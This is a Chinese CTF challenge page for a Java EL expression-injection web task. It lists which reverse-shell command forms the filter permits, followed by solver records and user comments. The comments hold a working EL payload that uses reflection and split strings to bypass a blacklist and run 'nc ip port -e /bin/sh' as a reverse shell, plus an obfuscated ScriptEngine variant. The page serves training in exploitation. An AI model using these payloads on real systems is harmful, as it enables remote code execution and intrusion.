Java EL表达式注入WEB 未解决
分数:
35
金币:
4
题目作者:
云牧青
一 血:
广告位招租
一血奖励:
10金币
解 决:
88
提 示:
描 述:
/bin/bash: X ; /bin/sh √ ; /dev/tcp X ; nc -e ip port X ; nc ip port -e √ ;
评分(2)
解题动态
小马哥 攻破了该题 9天前
jerryxucy 攻破了该题 16天前
w111 攻破了该题 18天前
binyu 攻破了该题 1月前
SkyAsh 攻破了该题 2月前
yanzhenfeng 攻破了该题 2月前
网恋秀牛子被录屏导致自卑 攻破了该题 3月前
ycxlo 攻破了该题 3月前
Achernar 攻破了该题 3月前
365days 攻破了该题 4月前
mantou 攻破了该题 6月前
M1crow3ve 攻破了该题 7月前
Bug@Bug 攻破了该题 7月前
admin666 攻破了该题 7月前
liusongxn 攻破了该题 7月前
kukuqi666 攻破了该题 7月前
ilovevicky99 攻破了该题 8月前
是大方子 攻破了该题 9月前
JJJleo 攻破了该题 9月前
评论
qq1002517 1月前
举报
反弹服务器没的。算鸟
binyu 1月前
举报
''.getClass().forName('java.lang.Run'+'time').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Run'+'time').getMethod('getRu'+'ntime').invoke(null),'nc ip port -e /bin/sh')
李逍遥逛霍格沃茨 1月前
举报
浪费时间和金币的题目,花金币买了write up也做不出来 最大问题是反向连接建立不了 按照两边的教程监听端口一点反应都没有 纹丝不动
l1nci 10月前
举报
做不出来,金币-5,呜呜呜
ailx10 1年前
举报
嘻嘻,参考:https://zhuanlan.zhihu.com/p/721560334
lzhui 1年前
举报
金币 -5
blackjack009 2年前
举报
new javax.script.ScriptEngineManager().getEngineByName(new String(new byte[]{106,115})).eval(new String(new byte[]{106...........}));
jack12138 3年前
举报
利用Java反射机制实现RCE,参考:http://www.hackdig.com/08/hack-459909.htm,题中用''.getClass()替代了Class,黑名单可利用字符串拼接绕过,如''.getClass().forName('java.lang.Run'+'time')
jack12138 3年前
举报
没做出来,记录一下,应该跟 MVEL.eval 有关系?没试出来
chips 3年前
举报
好难 金币-5